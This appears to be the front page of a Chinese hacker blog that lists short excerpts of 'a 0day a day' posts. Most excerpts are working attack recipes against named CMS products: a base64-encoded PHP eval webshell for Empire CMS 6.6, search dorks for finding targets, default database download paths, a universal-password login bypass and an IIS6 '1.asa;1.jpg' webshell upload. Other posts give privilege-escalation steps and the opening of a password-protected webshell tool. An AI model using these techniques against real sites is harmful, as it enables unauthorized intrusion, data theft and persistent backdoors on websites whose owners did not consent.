颓废's Blog - 致力关注于黑客技术、黑帽技术、网络信息安全

颓废's Blog

乌云白帽子
致力于网络安全领域
文章分享

致逝去的2016

阅读(441)评论(1)

2016年结束,迎来2017年。跑了很多地方,已经迷失了当年那种无忧无虑的时候,2016中国互联网安全大会回眼一看已失去了当年一样意气风发的熟人,换来的始终是新人,谁还记得2014年USENIX安全会上的哪几种技术突破,杰夫•莫斯说过以后要购买入侵保险.............. 现在的工作很累,网络只是爱好,不是用来炫耀的本钱,很开心...

一日一0day

帝国cms 6.6漏洞

阅读(784)评论(0)

自定义页面-增加自定义页面-随便写个.php文件名,内容写:<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script> 如果内容直接添一句话或者php大马是无用的,因为他会生成xxx....

一日一0day

阿曼达cms漏洞

阅读(476)评论(0)

                安全检测:阿曼达企业网站管理系统漏洞 关键字:inurl:cg_ProductShow.asp? 后台:amdin 默认数据库:Databases\tb11.md...

一日一0day

动科(dkcms)漏洞

阅读(553)评论(0)

官方网站:www.dkcms.com   主要是差不多3个版本为主吧,   V2.0   data/dkcm_ssdfhwejkfs.mdb   V3.1   _data/___dkcms_30_free.mdb   V4.2   _data/I^((...

一日一0day

汇成企业建站CMS系统漏洞

阅读(630)评论(0)

  关键字:[email protected]    Hui Cheng System V1.0   默认后台地址:admin/login.asp 默认数据库地址:Databases/huicheng.mdb

一日一0day

phpweb 0day

阅读(511)评论(0)

存在万能密码漏洞 IIS6.0直接解析漏洞拿shell IIS6.0以上的截断拿shell即可

一日一0day

新云0day

阅读(525)评论(0)

注册用户拿websehll 1 搜索使用新云程序的站点 利用百度搜索,关键字:inurl:/soft/show.asp?id=* 2 注册用户 3 登陆后选择-发布软件-文件上传上传大马,大马名字为1.asa;1.jpg 并且把不自动更名这个勾打上,这样一来我们上传的文件就不会被改名字了。  ...

网站攻防

简单明了的提权思路

阅读(1183)评论(0)

1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试...

文章分享

免脚本udf免杀支持从高版本mysql

阅读(798)评论(0)

免脚本udf免杀支持从高版本mysql  自己一直在用的    懂得人知道是什么东西  不懂的人不用太过查看   <?php $password='tuifei'; $shellname='颓废SEO专用'; $myurl=null; error_reporting...

网站攻防

国内近年网站后门地址(未完)

阅读(3920)评论(34)

现在的嗨客真的很多 ,也许是一个榜样的不够好还是什么,黑客电影,一个自以为黑客的中学生,同样伴随着网络的高速发展 越来越多的小学生步入到所谓的嘿课行业当中   唉  不多说了  总结一下近年内所有的网站后门地址 如果有网站被黑  请及时删除一下网站路径 下载密码回...